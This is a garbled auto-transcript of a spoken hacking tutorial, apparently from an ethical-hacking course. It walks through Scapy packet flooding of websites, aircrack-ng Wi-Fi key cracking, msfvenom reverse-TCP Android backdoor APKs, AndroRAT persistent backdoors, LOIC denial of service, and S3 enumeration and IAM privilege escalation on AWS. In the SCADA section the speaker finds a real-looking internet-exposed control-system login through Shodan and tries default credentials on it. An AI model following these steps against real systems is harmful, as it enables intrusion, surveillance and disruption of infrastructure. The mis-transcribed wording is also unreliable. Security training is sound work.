here send. Again you just type here IP, then you just type here source. So I would like to get here, come back here. So close this until. So I would like to send now as an TCP protocol, TCP, and you just type here as source port equal to 80, comma, then you just type here destination port equal to 80. Now I would like to come back here. Now I just type here packets. You just need to send a packets is like 100 packets, otherwise you just write 1000 packets. You just need to send. So I just need to look here first. So I don't need to, first I would like to type here as count equal to, I just use like a 1000. Now I would like to start again my Wireshark. Now it will start for coming. So you just enter. Now let's see. So here I not yet get any TCP at all. So I'm not getting any TCP here. So now I just quit this again. Now come back here. So you just quit it here. So again you just type here set IP source and come back here. You would like to look as TCP. Now we would like to use as S port. Oh, sorry. S port equal to 80, comma destination port equal to 80. We just come back here. Now we just type here count equal to, you just type here as 1000. That's enough. Now we would like to open again, start scanning now. So you just look here. Now when you look here, the TCP, so we already got it here, multiple TCP. You can see here lot of requests you got it here. So this is how you can flood any one of the targeted website also using a scapping. So now we would like to go for another tutorial. So come back here. So you can see here, send 1,000 packets. So if you want to use any, like you would like to look like again, like 10,000 packets. So now if you want to try again, you would like to look here again, you just continue without. So now it's not coming anything else. Now you just if enter here, you would like to look here. It will go for busting this one. So I've sent like 100,000 requests. So the system will become halted. Simple Service Discovery Protocol, SSDP. Now we are getting like as a TCP, you can see a TCP. So you can use in the place of TCP, you can look any other thing. So once you close this, so in the place of TCP, you can look like, you can replace as UDP. So I would like to send only 100 packets. So that's better for going further. So you just close this, open again. So now you just send here, it was sent. So you can see here UDP packets is sent. That's it. This is how you can do. So if you want to, that's it, UDP. So if you want to try any type of protocol here, like you can look here, come back here. As you want to try again as ARP, come back here. So you try again as an ARP. So close this, start, continue without saving. Now just come back here, enter. So it's not sending as an ARP request. That's it. So you just close this. So you just type here exit. Let's type here as exit. So you just type clear. So this is how you can perform through Wireshark as Scapy tutorial. So now our next tutorial is number 2, Wi-Fi packet analysis using Wireshark. So Wi-Fi packet analysis using Wireshark. So Wireshark is a network protocol sniffer and analyzer. It lets you capture and interactively browse the traffic running on target network. Wireshark can read a live data from Ethernet token ring, FTDI, serial, PPP, and SLIP, and 8011, and WireLAN, NCAP, and library that is integrated with the Wireshark for complete LAN traffic analysis and visualization. Drill down and reporting a Wireshark can be used in monitoring mode to capture a wireless traffic. It is also capture a vast number of management control data, frames, etc. and further analyze the radio tag header fields and gather a critical information such as protocols and encryption techniques and length of the frame, MAC address, and everything. So now we would like to look here. You just type here C downloads list. So I already have here as my coffee shop. So which I was done in my coffee shop. I already captured something else here. So I would like to use this. So for opening this one, you just type here Wireshark coffee shop one.cap. So this will open in now Wireshark. You can look here and analyze all the data. Now it's loading the coffee shop one.pcap. So let it load first. So you can see here everything here. So it's like in the D-Link. So once you read the data, so it's in like something not written correct. So once you go back here, so the data is not clear here. So to read this, Netgear Corporation. So you can look all the informations here like back here. So you can analyze all the information. So what else is like? That's it. So even you can get like a magnet Wi-Fi analyzer pro. So this is like a advanced tool. So still central packet analyzer. This also advanced tool. So Omni Peak network protocol analyzer. This I told you before. And common view Wi-Fi. This also a good one. So I can show you one by one tutorial here. So I just close this for time being. So I just come back here. So I can show you here as netla.com. So you can try these tools and demos.com. So wide and wireless network penetration testing. So you would like to look this NetLA. So network scanning. So you can look here wide solution for network scanning. Rare management mobile. So once you look here, when you get like any type of targeted thing, so you just type here I have config. So I have only my ETH0 targeted IP address and I have installed the Docker. That's it. Then I have my local host here. That's it. So for this, you just need to get it a physical hardware devices here is, I would like to tell you here is Alpha Guard Wi-Fi adapter. So you just need to purchase this one. So it will not cost less than $50 only. So this is best for Wi-Fi penetration testing. Alpha network process. So wireless USB adapter for this one. So this is almost less than $60. That's it. So this this is good for Wi-Fi penetration testing. Now I would like to look up one. Another one is Wi-Fi pineapple. So this is also a good one for Wi-Fi. So this will give a more wide range for your system. So you would like to look here, Wi-Fi pineapple. So here have in fact file. So we would like to look here. So I want to make with the Wi-Fi pineapple as some other courses for you. So I would like to make definitely. So I would like to purchase this one as an Wi-Fi pineapple. Then we would like to stick only for private internships. So it's well and good for Wi-Fi pineapple for enterprise penetration testing. So that's well and good to do this testing. So now we would like to go for close this also. So now we would like to go for another tutorial. Number 3 is so crack a WEP network using air crack engine. So Aircrack-ng is a network software suite consistent of detector packet sniffers WEP, WPA, WPA2, PSK, Cracker, an analysis tool for 802 and 11 wireless network. So this program runs both Linux and Windows. So in order to capture a traffic, so wireless adapter, so you just need to purchase like a Wi-Fi pineapple, otherwise that alpha guard of Wi-Fi adapter. So then and only you can capture the pcap files using through Wireshark. Then once you capture this one, we would like to go. So I already have some other capturing. So So now I would like to come back here. So I just type clear. So I just type list. So I already have here like uh, the coffee shop. So I would like to try to crack this password. So you just type here air crack minus ng. Now you just specify the uh, cap file. So just copy and paste it. That's it. So now it will start key found. You can see here we have found the key of the Wi-Fi. That's it. So we have find the key here. So in real like attackers will use this key to connect the access point and join the target of the network. Once they enter into the target network, they can use on scanning a tools to scan open devices, perform a vulnerability analysis, and start exploiting any vulnerabilities they find. So while using this one as a key, so they will go to here, they can find their targeted IP address like here, like a family kind or XYZ kind. Okay, so they just go there and try to connect it. That's it, using this key. So I'm not making as a full in-depth tutorial because I know how AlphaGuard, otherwise Wi-Fi Pineapple. So I would like to do for enterprise penetration testing. Then I would like to tell you what type of devices you need to purchase and every pin to pin details. We are going to discuss on that. Now, we are going to do for another one, another tutorial for crack a WPA2 network using aircrack engine. So WPA2 is an upgraded to WPA. It includes mandatory support for counter mode with a chipper block changing message authentication code protocol and AES based encryption protocol with a strong security. WPA has two modes of operations, WPA2 personal, WPA2 enterprise. Despite being stronger than both WEP and WPA and WPA2 encryption method, can also be cracked using various techniques and tools. So now I just come back here. So you just type list. So I already have here WPA2 crack one PCAP. So you just need to use the same thing. So this is my coffee shop. Just copy this one and paste it. Now I would like to, so I would like to enter first going to here. My BSS ID is, I just enter 20 E5 2A. So I just want to enter some other thing. So E4 my another BS ID. So you just type 38 and 00 and you just press this and you just need to specify uh, the password list. And I specify the word list is home Pentester Club and passwords.txt. So now you can see here key not found. Otherwise, I don't like to specify the passwords. So it's no. So it's asking, please specify the password list. So just open new tab, just type cd list, just type here nano passwords.txt. So I just enter here password 1. So just type control 4. You just type clear. So now we would like to go for again cracking. So now you can see a key found the password. So the targeted of base ID, the password is this one. That's it. So this is how you can crack the Wi-Fi. So now we would like to come back here. So now we would like to do another is tutorial. So now we're going for another task is hacking a mobile platforms. So now we are doing hacking a mobile platforms through an Android device. So I have installed the Android device. So now we would like to come back here. So our first target is hack an Android device using Metasploit. So attacker uses various tools such as Metasploit to create a binary payload, which are sent through a target system to gain control over it. The Metasploit framework is a Ruby-based modular penetration testing platform that enables you to write and test and execute exploit code. It contains a suite of tools that you can use to test a security vulnerabilities, to enumerate a network and execute an attack, and evade a detection Meterpreter, Metasploit attack and payload that provides an interactive shell that can be used to explore a target machine and execute the code. So now we would like to come back to our kernel Linux. So just open the terminal. So you just type here. You just type here service PostgreSQL start and enter your password. So it was done. So you just type here MSFenum payload for Android. And you just type here meterpreter and you just type here reverse underscore TCP and you just type here lhost equal to enter your targeted IP address 18.26 and lport equal to 192.168.18. Oh, sorry. I would like to change. My lport is 44. So you just don't need to specify. If you want to specify as an lport equal to 4444 and you just specify for platform for Android and you just type here is android.apk. So it will create for this Android machine as a backdoor. So now let's see. We'll create a payload. Then while it creating a payload, we just open new tab. We just type here MSF console. So I would like to create. So I just type here remove Android. So I would like to specify as a platform like Dalvik. That's better. Dalvik. So I will specify -a and Dalvik. Oh, sorry. Oh, sorry. Android.apk. So now you just type clear here. Now it will create the payload. So let it create the payload for this Android. Now we would like to see here. So come back here. So let it create. So while creating a payload, so let it create first that one we would like to go for. Use exploit multi-handler. So once you start the multi-handler, now you just type here set a payload. For your payload is, so again it's showing as no specified. So it's okay, no worries. So we don't need to think about much about this one. So the payload is Android meter reverse TCP. That's it. Now you just type here again set lhost, enter your targeted IP address 18.26 and set L port equal to 4444. Now you just type here show options, everything we have set up. Now before this one you just type here sudo su and enter your password. So you just type here move android.apk to where www html and share, and you just type here service apache to start. So I already explained this one in the system hacking how we are going to perform this one. So you just type here exploit -j and -jet. So now we would like to go to our Android device. Just open the Chrome browser. Now we would like to enter here in the targeted machine in the Chrome browser. Enter the targeted IP address. You just enter here. So it's us. So you just click on no thanks. So you just enter now HTTP. Enter the targeted IP address 18.26 /share. Just enter. So you can see here everything we got it here. So now we need to download only the android.apk file. Just download this. So this type of file can be harm your device. Do you want to keep it the Android APK? Okay. So we have done. So I just want to open this file and run. So main activity modify system, take a pictures and videos. So you need to allow a unknown sources of the in the Android. So once you click on next, then install. So once it's go for installation, now you would like to look here. So we have exploit is running in the background, jobs is 0, exploit completed but no session was created. We have got it like this. Now we just type here sessions -i1. So it's not started here. Come back here. So now I just try to open this app. So it was open this app. You can look here. It was open the app. Now you can look here from the staging stages. So it was open 3 times. So now you would like to look here. You just type here as sessions minus I. So you just type here sessions minus I 1. So we have successfully got the meter shell. So now you just type ID. We are not getting ID. So you just type here sysinfo. We are getting localhost Android 7.2, 7.2, Linux 4.9. So x64 English and US Dalvik Android. So we have successfully exploited this machine. So you can look here IP config. So in the IP config, there is the IPv4 address. You can look here. We got it here 23. So we got our targeted IP address. So if you want to look further, so you just type here pwd. So data uses 0.com metasploit stages.files. So the list of running processes might differ in your lab environment because a poor of security settings and lack of awareness. If an individual in an organization installs a backdoor files, otherwise any type of malicious files, the attacker gain the device. The attacker can perform a malicious activities such as uploading a worms, downloading a data, and spying on them. They can also use a keystrokes which will reveal a sensitive information relating of organizations of the victim. That's it. So this is how you can perform Android. So now we would like to do here is we go for. So now we are going to do here is another targeted tutorial. So I just want to close this and click on this. I would like to close all the apps. So now our next target tutorial is launch a DOS attack using Android machine. So how we can launch? So we can also perform a DOS attack through an Android. So we can install like some tools. You can use a Termex also. It's best. So based on your performing work, so you can try to use that one. So now I would like to. I already installed in my system as this LOIC. So I just open my targeted this one. Now I just open Kali Linux. So now just open a Wireshark. So let it start the Wireshark. Then I would like to look here it's 0. So I just start as an it's 0. Now let it run. Now go to your Android. So you just need to enter the targeted IP address is here. 192.168.18.26. Then port is 80 and threads is you just put like a 300 and you just type here get the IP. Oh, sorry, so I just need to come back here. HTTP, enter the targeted IP address 192.168.18.26. Then you just click on get the IP. You got it here IP. So you just need to make it this one as big. Then you can find here start for sending. So again, we would like to type here, get the IP address, we got it here. Then click on start for sending. So it start for sending all the packets. So now you can look here, you got it in the Wireshark, all the UDP protocols. So now you can see it was running a bunch of UDP protocols through an Android. So now we go for another tutorial, number 3. Exploit. So exploit the Android platform through ADB using Exploit. So I would like to go and get. So Android debugging bridge. So we call it like Android debugging system. So it is a vertical command line tool that let you communicate with a device. ADB facilitates a variety of device actions such as like installing or debugging apps and provides access to a unique shell that you can use to run a several different commands on a device. So now I would like to come back here. So I just need to close this. So now come back here. Now we just stop this. So now we would like to look here. Exploit GitHub. So just copy this one. Come back here. Open here. You just type here exit. You just type clear. So you just type here git clone and paste the repository. So now let it run this one. Copy this. You just type cd exploit list. So now we are installing this one, Colorama. So now just type here Python 3 exploit.python. So we have started now ADB. So now we would like to try to connect a new phone. Now we just enter the IP address. So it's not coming. So just put this. So sudo apt-get install ADB. So first we would like to install the ADB. So we would like to keep it this one as active until it will come. Click on OK. So now just type clear. So Now I would like to enter my targeted IP address. So I already know my targeted IP address is here is 23. So you just enter the targeted IP address 18.23. So here is like connection is refused. Now you just type here number 3 again 3. So enter the targeted IP address 18.23. So failed to connect, it was connection is refused. So we would like to try again one more time. Here is number 3. Enter the targeted IP address 18.3. So the connection was refused. So we would like to try in some other ways to access this one by ADB. So when you look here, we would like to look here. So it shows nmap does not found. So we would like to look here in the nmap. We would like to try here. We just type here exit. We just type here exit. We just type here clear. So we just type here sudo nmap port for 555 and enter the targeted IP address 18.23 and enter the port. So they was closed. So we cannot able to access the ADB. So I'm quitting this one now. I have already made some other Android debugging. So I just attach this one like how to connect with this one. So just close this. So now we would like to go for hack an Android device. Hack an Android device by creating a APK file using the Android. So we would like to go and download the Android. Now come back here. So we just type here Android GitHub. So Android is a tool designed to give a control of Android system to a remote user and to retrieve information from it. Android is a client and server application developed in Java Android. For the client side, the server is a Python Android write, provides a fully persistent backdoor for to the target device as an app start automatically on a device boot up. It also obtain a current location, SIM card details, IP address, MAC address, and every device information. So I would like to look here. Yes, this one. So I just copy this one, source code. Come back here. So you just type here git clone and paste the repository. So let it clone this one. So now we would like to go to here as Android. Now you just type here clear, you just type list. So here have requirements with 3 install -r requirements.txt. So we're gonna install the first requirements. Now we would like to come back here, so we just close this. Now we just open again as Chrome browser. Just enter. So we just need to go to the same targeted share folder. Now we would like to look here. We have successfully installed. So now you just type here Python 3 andro rad.python. So it's not came. So you just type here minus minus here. So we got it here. So we need to enter a build and an IP address and port. Then we would like to go for output. Then we need to get that output file. So we just type here clear. So I would like to show here one more time android build, and I would like to specify the IP and port and output name. So I don't need a shell at all. Okay. So now we would like to go here. You just type here Python 3 android minus minus build. Now you just need to open again new tab. New tab. It's okay. Well and good. So now once you type for build, so you just type minus I, enter the targeted IP address of your kernel Linux, and port is like 7890, and you just type here androrat.apk. Oh, sorry. I would like to specify the output is androrat.apk. That's it. So it will building an APK file and it will store in the same destination folder here itself. So let it see how long it will take for. So it's still building the app. So once it's built the app, now you like to go for listening. So now it will also make for the Android APK. So once it was done, now we would like to look for the same thing. We would like to type here a Python 3 andro rat dot python minus minus shell, and you just type minus I 0, enter the targeted IP address. So otherwise you just put 0.0 port is 7890. That's it. So waiting for connection. So you just copy the path of location. So you just need to do the same thing. You just type here sudo su and enter your password. So you just type here move and you just pasted this. Then you need to put this one into where www and html and share. That's it. So you have successfully shared this one. Now it was waiting for the Android connection. Now we would like to click come back here. You just refresh this. Now here you can see a androrat.apk. So we have successfully got it. This is in 2.2 MB. So we just click on this. So do you want to keep this Android app anyway? You just click on OK. Now it start for downloading. Now it's just open this one. Once you open this one, you just click on next, then click on install. So you just click on more details. So once you come back, your Kali Linux is still waiting for the connection. Now let's see. So it's going for Google Pay protection, so I don't want. Close this one. Now, if you would like to click on this, go to your downloads. So here is your android.apk, android.apk. So you just click on installing. So you can get a reversal here. That's it. So it's not coming. So now I would like to install very carefully here. Then click on install. So then you just need to click on Google Service Framework. So it will take more time for going this one. So close this. So click on this more details. So it's not trying to install. So I would like to minimize this. So it's coming like Google Pay protection. This app may be harmful. So once it's you also enable for unknown sources for installation also, it will come for protection. So you just type here more details. So taking it too long to proceed it. So once you click on more details, then you just click on don't send, then you are ready to go further. That's it. So it's ready to protect also here from here, but we are not getting this one. So once you install and click on open anyway, then you have successfully got the meter reversal. That's it here. That's it. So there is nothing else here to do. So now we would like to go further. So you can try as an another tools like netcut and browser, network spoofer, drive ship. So these are the best Android tools. So now we would like to go for another targeted tool. So now we are going to analyze a malicious app. using Android analyzer. So you just type here analyze a malicious app using online Android analyzer. So, online Android analyzer allows you to scan Android APK package and performs a security analysis to detect vulnerabilities in particular apps. Some trusted online sources analyzers are like 60 online APK analyzer. So we would like to look this one. Come back here. So you also look here APK analyzer online. So we would like to go for 60 APK analyzer, the first one. So I would like to click on select our Android APK file. Now we would like to click on home. Now you just click on like go to here. So you just type here APK. So once you click on select all files. So where is APK? So we not yet find any type of android.apk. We not yet find here. Distant.exe, txt. So where this we have created also that apk files is not visible. So now I would like to come back here, type list so you just need to find this android, just copy. So otherwise we just go here, click on this file, you just type here. No, we cannot get like this. So now I would like to open as a folder. So you just click on this pencil button, you just type here user share. So you just type here where www html share. So here I have android.apk. So I just drag and drop. So now you can look here the source code. So you can look here Android permission for requested permissions. So main test XML. So you can look here action for boot completed. So once boot is completed, there is an offset address. So this will be access for microphone, camera phone, and hardware camera, and a request ignore for battery optimization also it can take. Android, write a call logs, read a call log, set wallpaper, receive a boot completed, write external storage,
read SMS, camera, every information we can get it from here. So what else I have created in the payload in this? So we have set up a net listener. So what else we want to listen from this? So they have compiled and built this APK file and send it to the target. Once the target is installed, we are ready to access this one. So we have failed in port exploit, and so there is no ADB port available to access this one. So we would like to look another one. This one, Android, right? We have failed this one. So we would like to look this. So this is the entire of the payload for creating an APK file. So in the APK file, there's inbuilt like to write. There is like a reference, the theme label. That's it. Yeah. So now our next topic is IoT and OT hacking. So guys, now we are discussing about IoT and OT hacking. So what is IoT? IoT defines of Internet of Things. And what is OT? So OT defines for operational technology. So what is for IoT hacking? So IoT hacking like IoT devices like a smart home devices and like a cameras, CC cameras, otherwise thermometers, logs, and sensors and some other things. So wearable like smartwatches and fitness trackers and everything. So industrial IoT is like sensors accurate in factories. So factories they are using. So what are the common vulnerabilities we can find in this type of IoT devices? Like we can found like common vulnerabilities like weak or default passwords and unpatched firmwares, insecure communications. And attack methods is like botnet, man in the middle attack, and firmware hacking. So when you come to an operational technology, so in the OT systems like a SCADA supervisory control and data augmentation and distributed control system, programmable logic controls, and common vulnerabilities like legacy system, insecure network architecture, unpatched software is available. So how they gonna perform this type of attacks? Like through malware and network instructions and insider threats. So recently, as an Microsoft is came with the CrowdStrike as an entire of the worldwide is shut down. So if you want to study this one, you go to a malware news. Uh, then you can study each and every attack is going that will be presented in the live. So that's the best platform you can look it out. So now we would like to go here, come back here, IoT and hack, OT hacking. So now we would like to open a Firefox. The information regarding a target, IoT and OT devices can be acquired using a various online sources such as like who is domain lookup, advanced Google hacking, and Shodan search engine. The gathered information can be used to scan the devices for vulnerabilities and further exploit them to launch attack. So we would like to look as an come back here. So I would like to look here another targeted website. So now I would like to look here as something www.open.org. So You can look here OSS client profile. So OS is an organization that published the MQTT version 5 standard, which represent a significant leap in the refinement and capabilities of messaging protocol that already powers of IoT. So, so IoT run like MQTT. So the protocol. So we would like to look now some other things. So we would like to look by exploit DB, and we would like to look as Google hacking database. So you can find in the Google hacking database, like let it load this one first, it's processing the all. So title index of SCADA. So in title in URL for SCADA login. So we would like to look this one. So this entire work with by Google Docking. So you just need to entirely just copy this one, just copy, and you just open new tab, you just type here google.com, then paste it here. So you just paste it this and enter. So once you enter here, you would like to find is SCADA login RPMS. So you just click here SCADA login. So even you can find it's like a windmill as well as this solar system. So where you can access and control of these two things using this targeted website. So we would like to look also in the showdown.io. So this is also a best one to look it out. And you just also look here Genesis search. So here you just type here as SCADA, then click on search. So you need to take as a showdown as an paid membership. Then you can search anything in the showdown. That's well and good, but I don't like to recommend any type of purchasing by paid ones. So you can look here. There is a targeted IP address. So you just click on this targeted IP address. Then if you want to log in this one, just click on this loginlines.com. So there is an 8085 is an open port. It's redirecting as 302 as a successful login with the SCADA and the source code of the page. That's it. So enter the targeted IP address along with 8085. I would like to show you here. Come back here. Now you just type here 74.221.42198.8085. Then we would like to go further. Let's see. Now you can see here SCADA login. VTS SCADA. Software for monitoring and control. So there are some of the organizations they put for a normal like username is admin, password is admin. Then you just log in. So login failure, unknown username or bad password. So we don't know the username or password to log in here. So we just close this. So even in the same, when you come to SNS, you can find a lot more, much more information using the same view. So census loading is it will take a lot of things, but when you go with the showdown, it will give you only limited way. When you come to census, it will give much more information. I would like to present that one also SCADA. I just type search. Now we just see here. You would like to look here. So in here, you would like to look here. There is also available for remote access for the RDP and for the SCADA. So you can exploit the RDP and take over entirely here. So this one, I would like to select this one
So I would like to show you here. NetbioS system 137. It's in UDP working work ADA AOFTS SCADA. We would like to look here. SME is available. HTTP is available. Unknown. So if you would like to visit this targeted website, link open in new tab. Now we would like to see here another targeted one. Terracar. We can found it here, this one. Let's see what the information we can get it. So we don't know the username and password. So here have register also. So we can exploit this one of the targeted machine. So as an ethical hacker or a penetration tester, must and should know. So you need to choose your target specifically. Then you just go accordingly using by Showdown or Census. So these are the best two search engines to find as IoT and IT and a leaked database of the any targeted of big IP databases also. You can find billions of IP addresses in this world. So when you go with the Showdown, so you need to take a paid membership. So that's for getting a requesters. That one you need to pay a little bit money. So I not at use as for pricing all those things. So I go with the only a free data. So census is almost all free. So you want some advanced features using with AI or something else, and advanced leak which was not presented in public and private. So private groups also that will be presented for you in the census. So this is only in a limited way, and this is in unlimited way. But here is like you can use like only for public. What else publicly leaked? Like they have billions of IPs, and they will give for private one. That is somewhat useful information to perform. That's it. So uh, choose wisely. So which one is best for you? Okay. So we would like to go for another targeted. So our number 18, we would like to go for cloud computing. So what is a cloud computing? Cloud computing refers to a delivery of computing service, including like servers, storage, databases, network, and software and analytics over the internet. The cloud here is like we can define a cloud like public cloud. So a public cloud, every body can access this one, and private cloud. So the private cloud only like certain users. So if I take a private cloud, that is only for my personal, for my organization, that's it. And hybrid cloud. So public cloud is a free resource, and private cloud is like you need to pay like little bit money to utilizing these private clouds. Like monthly charges, like if you take AWS Amazon, that will cost you almost all per month. So AWS Amazon is totally a scam, including Azure, Google Cloud, everything. So AWS Amazon, they will say once you register, they will give 750 hours for a free, and 1 year for free, and 750 hours. So once you consider as 750 hours, so that will become only 1 month. So these for private clouds only for using personal things. So hybrid cloud. So this they can use like a NASA, in ISRO, or some other. It will cost is highly effective. So if you want to open like a Bitcoin node as an organization, otherwise a Coinbase node, so they can host in the hybrid clouds. So a lot of requesters, load balancers, and everything can be accessed from there. But it was secure. So our first task is we would like to go for enumerate S3 buckets using lazy S3. type here enumerate S3 bucket using lazy S3. So, lazy S3 is an Ruby script tool that is used to brute force AWS S3 buckets using a different permutation. This tool obtains the publicly accessible S3 buckets and also allows you to search the S3 buckets on specific company by entering the company name. So now we would like to go and look that one. Come back here. So I just type here lazy S3 GitHub. So I got here the lazy S3 GitHub. So you just copy this one. Now let it come. So we just open the terminal. So you just make it as big. So you just type here git clone and paste it the repository. So it will clone the repository. Now you just type here cd lazy s3. Now you just type list. So now you just type here ruby lazy s3 dot ruby. So now just enter. So found a bucket. You can see here every information we are getting here. So now we would like to search a specific company about the targeted one. We would like to look here. I just quit this. So we would like to type here as clear. So I would like to find as in specific company. I just type here hacker one. Now we would like to see here. So found a bucket hacker 1403. That's it. So you can try any one of the targeted way domain. So now you just type here. I would like to go for Amazon. Found a bucket. You can see here. You can found a buckets. So this is how you can perform enumerating a lazy S3. So you just also look here as try hack me. So it will take some times to generate all the things. So we already found try hack me 403. So just quit it. So just type cd. You just type clear. So this is how you can perform. So our next tutorial is so now we would like to come back here. Number 2 is enumerate S3 buckets using S3 scanner. So we would like to see what is S3 scanner. S3 scanner is a tool that finds the open S3 buckets and dump their content. It takes a list of bucket names and check as an input the S3 bucket that are found and output file the tool also dump are a list of content open buckets locally. So we would like to go and get the S3 scanner. Now come back here. So you just type here S3 scanner GitHub. So you just need to copy this one. So I just enter as manually. So I just type here git clone git @
github.com sa7mon s3 scanner.git. Are you sure you want to continue? So you say yes. So I would like to get as an Python script. So better without going that one. So I just copy this one, come back here. So you just type here. So it will run under the root. Enter your password, just type here. So now it will install the S3 scanner. So it was installed. So you just type here clear. Sorry, you just type here clear. You just type here S3 scanner minus minus head. So we have got it here. So I would like to specify as an size first. So I would like to specify the site as like, come back here. So you just type here mousepad sites.txt. So I would like to specify a sites. So here it's not gonna pop up. Don't save. Just type new tab. Mousepad sites.txt. So you just specify the sites tryhackme.com, hacker1.com. Now we would like to type. Another is hackthebox.com, bugcrowd.com. Now I would like to type here google.com, and I would like to type what type of domains we're gonna type here, yahoo.com. So that's we would like to use kindbase.com, db.com, and amazon.com. Then I would like to type here as paxful.com. So you just type here control O. Oh, sorry. Come back here. So you just save it with this. So you just type here cat sites.txt. So we have our sites here. So now come back here. Just type clear. So S3 buckets, S3 scanner. Now you just type here sites.txt. Now you just specify the bucket minus MQ is required. So it's not running. So let's wait. Once again, we would like to look here in our targeted things, cloud computing, GitHub tools, S3 scanner, sites.txt. So I would like to take this. So just copy, come back, close this. So let's see.
mousepad sites.txt. So I would like to take entirely just paste it this and save. Now we would like to run only the sites. So exactly one of the bucket or bucket file is required. So you just type here bucket and S3 bucket file minus mq is required. So we are not getting this thing. So we would like to specify buckets. So we would like to look here. So ignore everything in the directory and accept this git node file. So we now have this. Okay, once again. Come back here. You just type here cmd. So you just type here directory. So you just type here Python 3 s3 scanner dot s3 scanner dot python sites.txt. So it's not working here also. So you can try this one some other way. So we would like to try this one a later. Now we would like to look. So exploit open S3 buckets using AWS CLI. So before I would like to take this entire of the source code. So I just type here as compressors zip file. Yes. Now I would like to come back here. Just type here topic share. So let it come. Number 3. Exploit open S3 buckets using AWS CLI. So first we would like to complete this tool, then we go. So that the AWS command line interface is unified tool for managing AWS services with just one tool to download and configure. So you can control a multiple AWS services from the command line and automate them through a scripts. So I would like to come back here. Go to come back cloud computing. Scanner. So it's not going. So better. Yeah, it's get too late. So just copy it, come back here. So we would like to delete this, back here, paste it. So when no have Python file, it never gonna work in some other tutorials. So let it come. So before that, if you know have AWS Amazon account, so if you have AWS Amazon account, so you create one account and click done here. So once you create an account, you just need to verify with $1 or $2 with your credit card or debit card. So once you have verified that one, so now we just come back here. So let it come that one. So you just type here exit, you just type here clear. So you just type here pip3 install AWS CLI. That's it. We just type enter. So now it will install AWS CLI. So now I go to downloads list, unzip s3 scanner.zip. So I just type clear, we just type list cd s3 scanner list. So first we would like to install the requirements. So I just type here pip3 install -r requirements.txt. So let it install first. So now just type here clear. Now just type list. So you just type here Python 3 and s3 scanner.python -help. So you can look here, the same thing we have got it here. So now I would like to specify as sites.txt. What else here have inside? Now let's see. So AWS credentials is not configured. Open buckets will be shown as closed and running AWS configured to fix this. So you can see they have found AWS client. So it will only working through this targeted thing. That's it. So now we have installed the AWS client. Now we would like to go for, we will type here clear cd clear. So you just type here clear. So you just type here AWS CLI. So AWS -help. Yes. Yes. So it's taking too long. So we have installed successfully. Now just type here AWS -help. So now we have seen this AWS. So now just see here AWS options, command, subcommands, and parameters. So now we would like to type here AWS configure and press enter. Now let's see. So AWS access key. So I would like to get the AWS access key. So now you just open this, click on the pluses and account. So we would like to click on the security credentials first. Now we would like to go. So here we have like account ID and canonical user ID. So if you don't have anything else here, we would like to create one, let it load first. So as of internet is very weak, it's not coming. See. So here access keys. So here no have access keys. So I would like to create an access key. So I would like to type. I understand and creating a root access key is not a best practice, but I still want to create one. So just create one access key and secret key. So here I got it access key. So come back here in the access key. You just paste it, the access key. Now again, you would like to come back here. You just look here as secret key, copy this, come back here, paste it. So default reason, you just type yes, default output format. So it will ask a default output format is so I just need to put a reason name in the global, that does not matter. That's it. So I just need to put it this in one of my. So again, if you go for AWS configure, access ID, secret ID, global, that's enough. So we have successfully created. So just copy this one. I just save in one of the notepad this AWS. So just aws.txt. So just close this. So we have successfully created now. So now we would like to get something. Now we just type as here as clear. So you just type here AWS S3 bucket. I would like to look as a list and S3, and you just type here anything certified hacker what you specify here. So the bucket name may be a different on your lab environment, and now you can look here. We would like to get something of the buckets. Could not connect to the endpoints of certified ethical hacker. So we would like to look here as uh, hack, try hack me. We would like to look here. So it's not connecting to the targeted website. So once you have got it all the thing, so you would like to directly visit from here. So I would like to try as bug crowd. Let's see. So you can enumerate what else you required from the targeted organization. So you have all the information from here. So we cannot able to connect anything as s3.global amazon aws.com list type. So when you want to configure to some other things like in the reason, so you can configure like a global, otherwise whichever you like you can configure. So the global is the best one to get all the information. So we would like to go, but we are not getting any type of results here to cross checking. So I would like to try here Tesla. So let's see.
So, but we are not getting as connected. So you try any one of the leak one, like I try with the Amazon. Now let's see. So the leak one which may present here. So you can try your own. Then if you want to add or modify anything else, so you just write here as a nano, otherwise hack.txt, and you just type here as you are hack, then you just type Control O, Control X. Now you just type here clear. Now you just type here AWS S3, and you just type here remove of S3 bucket from, you just type here. So if you want to add something, we would like to type here here. So we would like to go first as move, as we would like to go to hack.txt. We would like to set as S3 to a targeted uh, website like tryhackme.com. So you need to get a specified thing, then and only you can get it. Move. The tryhackme could not connect to the endpoint of the S3 at globalamazon.com or tryhackme. So you can move the text and remove the text. You can alter the text also. That's it here. So you try whatever the file domain, what else you require. So we would like to go for again. Number 4 is escalate I am user privileges by exploiting misconfiguration, misconfigured user policy. So a policy is an entity that, when attached to an identity or resource, defines its permission. So you can use the AWS Management Console and AWS CLI and AWS API to create a customer management managed policies. In IAM customer managed policies are standalone policies that you administer in your AWS account. You can then attach the policies and identify user groups and roles in AWS account. If the user policies are not configured properly, they can be exploited by attacker to gain full administrator access to the target user AWS account. So we already configured our AWS thing. So we already configured our AWS thing, so we no need to worry here. So now just type here nano, just type here user policy dot json. Now we would like to enter as version 2012 10. So I'm just writing as a manual coding, so let it be done faster. Then you just type here statement. So I would like to specify as every open and closing brackets here as dollar symbol. Here is dollar. Here is dollar. Here is dollar. Here is dollar. Dollar. Just type here Control O and Control X. So we have created a user policy now. So now I just type here AWS I am create policy. Now we would like to type here minus minus policy name, policy name equal to, so you just type here user policy and policy document file equal to user policy dot json, and you just press enter. Now let's see. So here note AWS CLI version 2, the latest major thing are recommended for general use. For the information see that AWS I. So invalid a create policy. So we have I am create policies. So it is an invalid to create a policy. Why we cannot create a policy here? So we cannot create like a root, create a policy, policy name, user policy, policy document, file. Let's see. So it's also again failed. So we cannot able to get this one. Okay, I have mistaken here CR create. Create policy, policy name, user policy, policy document, policy.json. Now let's see. An error occurred malform policy document when calling the create policy operation syntax errors in policy. So I got it as a syntax error here. So what is the syntax error? So you just type here clear. Let's see again. What is the syntax error? So you just type here as nano user policy.json. So I would like to remove this dollar. That's better. I would like to remove. Now you just type Control O, Control X. Now you just type here. An error occurred. Malform policy document when calling the create policy operation, the policy fall legacy policy. So wait for it's a legacy policy. So we would like to use as a root here. So while working on this cloud penetration testing, it will take a lot of time. So you need to do it very patiently. Then and only you can get to understand. So now how? So again it will become a wrong. So let's type here. I am create policy. So we would like to reconfigure this one. Come back here. Nano user policy.json. We just type dollar. Capital E is a version. We would like to go back here as put the dollar symbol. Then we would like to go for statement. Then you specify the dollar symbol. So specify now downside as dollar symbol. Then effective allow as so. Here is a syntax error. Is allow capital A. That's the syntax error. Dollar action dollar resource 